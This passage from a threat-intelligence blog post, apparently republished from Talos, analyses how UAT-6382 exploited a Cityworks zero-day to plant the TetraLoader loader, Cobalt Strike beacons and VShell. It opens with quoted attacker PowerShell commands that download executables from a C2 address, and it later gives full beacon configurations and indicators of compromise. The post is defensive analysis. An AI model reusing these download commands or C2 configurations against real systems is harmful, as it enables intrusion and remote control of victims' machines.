\\LVLWPH[.]exe’\u00a0
\u00a0
cmd.exe \/c powershell -Command Invoke-WebRequest -Uri ‘http:\/\/192[.]210[.]239[.]172:3219\/MCUCAT[.]exe’ -OutFile ‘C:\\windows\\temp\\z1.exe’\u00a0
\u00a0
powershell -Command Invoke-WebRequest -Uri ‘http:\/\/192[.]210[.]239[.]172:3219\/TJPLYT[.]exe’ -OutFile ‘C:\\windows\\temp\\z33.exe’\u00a0
\u00a0
cmd.exe \/c powershell -Command Invoke-WebRequest -Uri ‘http:\/\/192[.]210[.]239[.]172:3219\/z44[.]exe’ -OutFile ‘C:\\windows\\temp\\z44.exe’\u00a0<\/p>\nThe implants Talos recovered are Rust-based loaders containing an encoded or encrypted payload. The payload is decoded\/decrypted and injected into a benign process by the loader component. We track the loaders as “**TetraLoader.** “<\/p>\n
### TetraLoader analysis<\/p>\n
TetraLoader is a simple Rust-based loader. It will decode an embedded payload and inject it into a benign process such as notepad[.]exe to activate the payload. Talos has so far found two types of payloads deployed by TetraLoader on the infected endpoints:<\/p>\n
1. **Cobalt Strike beacons** : These are position-independent, in-memory Cobalt Strike beacon shellcodes that are injected into a specified benign process by TetraLoader.
2. **VShell stager** : Position independent shellcode, we’ve identified as a stager for VShell, that talks to a hardcoded C2 server and executes code issued to it.<\/p>\n
TetraLoader is built using a relatively new payload builder framework known as “MaLoader,” which first appeared on GitHub in December 2024. MaLoader has multiple options to encode and embed shellcodes into TetraLoader, the Rust-based container.<\/p>\n
<\/p>\n
Figure 2. MaLoader’s builder interface<\/p>\n
MaLoader is written in Simplified Chinese, indicating that threat actors that employed it likely knew the language to a substantial degree of proficiency.<\/p>\n
### Cobalt Strike beacons<\/p>\n
The Cobalt Strike beacons are relatively straightforward, with minimal changes as compared to traditionally generated Cobalt Strike beacons. One of the beacons Talos discovered reaches out to the command-and-control (C2) domain “cdn[.]lgaircon[.]xyz” and specifically consists of the following configuration settings:<\/p>\n
BeaconType – HTTPS
Port – 443
SleepTime – 45000
MaxGetSize – 2801745
Jitter – 37
MaxDNS – Not Found
PublicKey – b’0\\x81\\x9f0\\r\\x06\\t*\\x86H\\x86\\xf7\\r\\x01\\x01\\x01\\x05\\x00\\x03\\x81\\x8d\\x000\\x81\\x89\\x02\\x81\\x81\\x00\\x81\\x92\\xaa\\x1d\\xdeph\\xa6\\x80\\xf7\\xc9\\x7f\\xcf\\xba\\xce6\\xd9\\x11(\\x00\\x1a\\x95<\\xa5\\xdf\\x19\\x06\\xf3\\xd1;\\xb1\\x15\\xe9\\xdb\\xcan\\xc6\\xba\\xdb{\\xd3\\xc4,\\xd4\\xcf\\xd1\\x07\\xe2\\x1fi\\x07%\\xd2r\\x9c\\xa7\\xd1z+z\\xdd\\xac\\xd0\\x18\\x04\\x8e\\xfbqp\\xe1\\xe1\\xb81\\xb1v\\x12\\xe4\\x8d\\xf0\\xc0v\\x1c\\xf9\\xc6\\xca\\xc8\\xed\\xc4,y~\\x17r\\xebp)\\xed\\xa6\\xba\\xdc\\xf5+\\xeds.t\\xdc\\x8bl\\xee&\\x9e\\x84\\xb4a\\xb1k\\x9a\\xc1x\\x00q\\r\\xe6\\xbfq\\x02\\x03\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' 0 17500 987654321 c2server - cdn[.]lgaircon[.]xyz, jquery-3[.]3[.]1[.]min[.]js useragent not found httpposturi jquery-3[.]3[.]2[.]min[.]js httpget_metadata httppost_metadata spawnto b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00' pipename dns_idle dns_sleep ssh_host ssh_port ssh_username ssh_password_plaintext ssh_password_pubkey httpget_verb get httppost_verb post httppostchunk spawnto_x86 %windir%\\syswow64\\dllhost[.]exe spawnto_x64 %windir%\\sysnative\\dllhost[.]exe cryptoscheme proxy_config proxy_user proxy_password proxy_behavior use ie settings watermark bstagecleanup true bcfgcaution false killdate bprocinject_startrwx bprocinject_userwx bprocinject_minallocsize procinject_prependappend_x86 b'\\x90\\x90' empty procinject_prependappend_x64 procinject_execute ntdll:rtluserthreadstart createthread ntqueueapcthread-s createremotethread rtlcreateuserthread procinject_allocationmethod ntmapviewofsection busescookies hostheader host: cdn[.]lgaircon[.]xyz < pre><\/p>\n
A second beacon using the same C2 domain consists of the following more detailed configuration:<\/p>\n
BeaconType – HTTPS
Port – 443 <\/p>\n
SleepTime – 35000
MaxGetSize – 2097152
Jitter – 30
MaxDNS – Not Found <\/p>\n
PublicKey_MD5 – 00c96a736d29c55e29c5e3291aedb0fd <\/p>\n
C2Server – lgaircon[.]xyz,\/owa\/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2
UserAgent – Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/14.0.3 Safari\/605.1.15 <\/p>\n
HttpPostUri – \/owa\/idQ0RKiA2O1i9KKDzKRdmIBmkA8uQxmFzpBGRzGjaqG <\/p>\n
Malleable_C2_Instructions – NetBIOS decode ‘a’ <\/p>\n
HttpGet_Metadata – ConstHeaders
Host: lgaircon[.]xyz
Accept: *\/ *
Cookie: MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;ClientId=1C0F6C5D910F9;MSPAuth=3EkAjDKjI;xid=730bf7;wla42=ZG0yMzA2KjEs
ConstParams
path=\/calendar
Metadata
netbios
parameter “wa” <\/p>\n
HttpPost_Metadata – ConstHeaders
Host: lgaircon[.]xyz
Accept: *\/ *
SessionId
netbios
prepend “wla42=”
prepend “xid=730bf7;”
prepend “MSPAuth=3EkAjDKjI;”
prepend “ClientId=1C0F6C5D910F9;”
prepend “MicrosoftApplicationsTelemetryDeviceId=95c18d8-4dce9854;”
header “Cookie”
Output
netbios
parameter “wa” <\/p>\n
PipeName – Not Found
DNS_Idle – Not Found
DNS_Sleep – Not Found
SSH_Host – Not Found
SSH_Port – Not Found
SSH_Username – Not Found
SSH_Password_Plaintext – Not Found
SSH_Password_Pubkey – Not Found
SSH_Banner – <\/p>\n
HttpGet_Verb – GET
HttpPost_Verb – GET
HttpPostChunk – 96 <\/p>\n
Spawnto_x86 – %windir%\\syswow64\\gpupdate[.]exe
Spawnto_x64 – %windir%\\sysnative\\gpupdate[.]exe <\/p>\n
CryptoScheme – 0 <\/p>\n
Proxy_Config – Not Found
Proxy_User – Not Found
Proxy_Password – Not Found
Proxy_Behavior – Use IE settings <\/p>\n
Watermark_Hash – NtZOV6JzDr9QkEnX6bobPg==
Watermark – 987654321 <\/p>\n
bStageCleanup – True
bCFGCaution – False <\/p>\n
KillDate – 0 <\/p>\n
bProcInject_StartRWX – True
bProcInject_UseRWX – False
bProcInject_MinAllocSize – 26808
ProcInject_PrependAppend_x86 – b’\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90′
Empty <\/p>\n
ProcInject_PrependAppend_x64 – b’\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90′
Empty <\/p>\n
ProcInject_Execute – ntdll[.]dll:RtlUserThreadStart
NtQueueApcThread-s
SetThreadContext
CreateRemoteThread
kernel32[.]dll:LoadLibraryA
RtlCreateUserThread <\/p>\n
ProcInject_AllocationMethod – VirtualAllocEx <\/p>\n
bUsesCookies – True
HostHeader –
headersToRemove – Not Found <\/p>\n
DNS_Beaconing – Not Found
DNS_get_TypeA – Not Found
DNS_get_TypeAAAA – Not Found
DNS_get_TypeTXT – Not Found
DNS_put_metadata – Not Found
DNS_put_output – Not Found
DNS_resolver – Not Found
DNS_strategy – round-robin
DNS_strategy_rotate_seconds – -1
DNS_strategy_fail_x – -1
DNS_strategy_fail_seconds – -1
Retry_Max_Attempts – 0
Retry_Increase_Attempts – 0
Retry_Duration – 0 <\/p>\n
Another beacon reaches out to C2 “www[.]roomako[.]com” and has the following configuration:<\/p>\n
BeaconType – HTTPS
Port – 443
SleepTime – 25000
MaxGetSize – 2801745
Jitter – 37
MaxDNS – Not Found <\/p>\n
PublicKey – b”0\\x81\\x9f0\\r\\x06\\t*\\x86H\\x86\\xf7\\r\\x01\\x01\\x01\\x05\\x00\\x03\\x81\\x8d\\x000\\x81\\x89\\x02\\x81\\x81\\x00\\xaa#\\x18\\xebx;\\xd3?\\xe7\\xa7\\xb5\\x95\\xb1\\xe7\\xb2a\\x99O)\\x8e\\xebx\/:\\xc10c\\xfe\\x04#\\xe5_ \\x82\\xab\\x9d\\xbe\\x99\\xd0W\\xb5\\xfafra\\x14@\\x9a\\x16Fs5\\xa0\\xe6\\xf3\\xa6\\x13\\xdc\\x91N\\xdeql\\x89\\xc5RkD\\xefq\\xea\\xa8\\xc5’$\\xdf]l#\\xacs\\x0c\/;\\xc3E\\xf8\\x0fS\\x7f\\xbd\\xcd\\x0b]E\\x97\\xf2\\xf2Q\\xe8\\x00\\xa7u\\x04\\x90\\r\\x95\\xfd\\xac`k9\\xefa\\xe5\\x9ftW\\xc5\\xc7\\x90\\xb8\\x8a\\x15\\xab+\\x02\\x03\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00″ <\/p>\n
C2Server – www[.]roomako[.]com,\/jquery-3[.]3[.]1[.]min[.]js
UserAgent – Not Found
HttpPostUri – \/jquery-3[.]3[.]2[.]min[.]js
HttpGet_Metadata – Not Found
HttpPost_Metadata – Not Found <\/p>\n
SpawnTo – b’\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00′<\/p>\n
PipeName – Not Found <\/p>\n
DNS_Idle – Not Found
DNS_Sleep – Not Found
SSH_Host – Not Found
SSH_Port – Not Found
SSH_Username – Not Found
SSH_Password_Plaintext – Not Found
SSH_Password_Pubkey – Not Found <\/p>\n
HttpGet_Verb – GET
HttpPost_Verb – POST
HttpPostChunk – 0 <\/p>\n
Spawnto_x86 – %windir%\\syswow64\\dllhost[.]exe
Spawnto_x64 – %windir%\\sysnative\\dllhost[.]exe <\/p>\n
CryptoScheme – 0 <\/p>\n
Proxy_Config – Not Found
Proxy_User – Not Found
Proxy_Password – Not Found
Proxy_Behavior – Use IE settings <\/p>\n
Watermark – 987654321
bStageCleanup – True
bCFGCaution – False
KillDate – 0 <\/p>\n
bProcInject_StartRWX – False
bProcInject_UseRWX – False
bProcInject_MinAllocSize – 17500
ProcInject_PrependAppend_x86 – b’\\x90\\x90\\x90′
Empty <\/p>\n
ProcInject_PrependAppend_x64 – b’\\x90\\x90\\x90′
Empty <\/p>\n
ProcInject_Execute – ntdll:RtlUserThreadStart
CreateThread
NtQueueApcThread-s
CreateRemoteThread
RtlCreateUserThread <\/p>\n
ProcInject_AllocationMethod – NtMapViewOfSection <\/p>\n
bUsesCookies – True <\/p>\n
HostHeader – Host: www[.]roomako[.]com <\/p>\n
### VShell stager<\/p>\n
The VShell stager is relatively simple and uses rudimentary socket APIs to connect with a hardcoded C2 server such as “192[.]210[.]239[.]172:2219”. The stager, usually injected into a benign process by TetraLoader, initially sends a preliminary beacon to the C2 and then waits for a response. The response sent by the C2 is usually a single-byte Xorred payload that is then executed in memory by the implant. This is likely UAT-6382’s modification in VShell.<\/p>\n
Figure 3. Implant receiving and executing shellcode from the C2.<\/p>\n
The payload received by the VShell stager is in fact the actual VShell implant. VShell is a GoLang-based implant that talks to its C2 and provides a wide variety of remote access trojan-based functionalities, such as the capabilities to perform file management, run arbitrary commands, take screenshots and run NPS-based proxies on the infected endpoint.<\/p>\n
Figure 4. A sample VShell C2 server with one client connected.<\/p>\n
Like other Chinese-authored tooling observed in the intrusions, VShell C2 panels are also written in Chinese. Although limited language support for English is available in the panel, it still mostly uses the Chinese language as seen in Figure 5, indicating that operators need to be familiar with the language to use the panel proficiently.<\/p>\n
Figure 5. VShell’s file manager panel uses Chinese even when configured to use English.<\/p>\n
## Coverage<\/p>\n
Ways our customers can detect and block this threat are listed below.<\/p>\n
<\/p>\n
_Cisco Secure Endpoint_ (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free _here._<\/p>\n
_Cisco Secure Email_ (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free _here_.<\/p>\n
_Cisco Secure Firewall_ (formerly Next-Generation Firewall and Firepower NGFW) appliances such as _Threat Defense Virtual_, _Adaptive Security Appliance_ and _Meraki MX_ can detect malicious activity associated with this threat.<\/p>\n
_Cisco Secure Network\/Cloud Analytics_ (Stealthwatch\/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.<\/p>\n
_Cisco Secure Malware Analytics_ (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.<\/p>\n
_Cisco Secure Access_ is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.<\/p>\n
_Umbrella_, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.<\/p>\n
_Cisco Secure Web Appliance_ (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.<\/p>\n
Additional protections with context to your specific environment and threat data are available from the _Firewall Management Center_.<\/p>\n
_Cisco Duo_ provides multi-factor authentication for users to ensure only those authorized are accessing your network.<\/p>\n
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on _Snort.org_.<\/p>\n
## Indicators of compromise (IOCs)<\/p>\n
The IOCs can also be found in our GitHub repository here.<\/p>\n
**TetraLoader**<\/p>\n
14ed3878b6623c287283a8a80020f68e1cb6bfc37b236f33a95f3a64c4f4611f\u00a0
4ffc33bdc8527a2e8cb87e49cdc16c3b1480dfc135e507d552f581a67d1850a9\u00a0
1de72c03927bcd2810ce98205ff871ef1ebf4344fba187e126e50caa1e43250b\u00a0
1c38e3cda8ac6d79d9da40834367697a209c6b07e6b3ab93b3a4f375b161a901\u00a0<\/p>\n
**CobaltStrike beacons**<\/p>\n
C02d50d0eb3974818091b8dd91a8bbb8cdefd94d4568a4aea8e1dcdd8869f738\u00a0<\/p>\n
**Network IOCs**<\/p>\n
cdn[.]phototagx[.]com\u00a0
www[.]roomako[.]com\u00a0
lgaircon[.]xyz
https:\/\/www[.]roomako[.]com\/jquery-3[.]3[.]1[.]min[.]js\u00a0\u00a0
https:\/\/lgaircon[.]xyz\/owa\/OPWiaTU-ZEbuwIAKGPHoQAP006-PTsjBGKQUxZorq2\u00a0
https:\/\/cdn[.]lgaircon[.]xyz\/jquery-3[.]3[.]1[.]min[.]js\u00a0
hxxps[:\/\/]cdn[.]phototagx[.]com\/\u00a0
\u00a0\u00a0
192[.]210[.]239[.]172\u00a0
hxxp[:\/\/]192[.]210[.]239[.]172:3219\/LVLWPH[.]exe\u00a0
hxxp[:\/\/]192[.]210[.]239[.]172:3219\/MCUCAT[.]exe\u00a0
hxxp[:\/\/]192[.]210[.]239[.]172:3219\/TJPLYT[.]exe\u00a0
hxxp[:\/\/]192[.]210[.]239[.]172:3219\/z44[.]exe\n<\/div>\n
View Advisory Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"Security Update News Update Information Title UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware Update ID TALOSBLOG:6A5B598DC62B478679323E21AD8A87D0 Type talosblog Published 2025-05-22T10:00:42 Last Updated 2025-05-22T10:00:42 Security…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,81,12,15,13,7,69,11,5],"class_list":["post-5629","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-cvss-86","tag-exploit","tag-high","tag-news","tag-security","tag-talosblog","tag-tapic","tag-vulnerability"],"yoast_head":"\n
UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=5629\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Security Update News Update Information Title UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware Update ID TALOSBLOG:6A5B598DC62B478679323E21AD8A87D0 Type talosblog Published 2025-05-22T10:00:42 Last Updated 2025-05-22T10:00:42 Security...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=5629\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-22T07:34:32+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5629#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5629\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware\",\"datePublished\":\"2025-05-22T07:34:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5629\"},\"wordCount\":1031,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.6\",\"exploit\",\"HIGH\",\"news\",\"Security\",\"talosblog\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=5629#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5629\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5629\",\"name\":\"UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-22T07:34:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5629#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=5629\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=5629#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=5629","og_locale":"en_US","og_type":"article","og_title":"UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware - zero redgem","og_description":"Security Update News Update Information Title UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware Update ID TALOSBLOG:6A5B598DC62B478679323E21AD8A87D0 Type talosblog Published 2025-05-22T10:00:42 Last Updated 2025-05-22T10:00:42 Security...","og_url":"https:\/\/zero.redgem.net\/?p=5629","og_site_name":"zero redgem","article_published_time":"2025-05-22T07:34:32+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=5629#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=5629"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware","datePublished":"2025-05-22T07:34:32+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=5629"},"wordCount":1031,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.6","exploit","HIGH","news","Security","talosblog","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=5629#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=5629","url":"https:\/\/zero.redgem.net\/?p=5629","name":"UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-22T07:34:32+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=5629#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=5629"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=5629#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/5629","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5629"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/5629\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5629"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5629"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5629"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}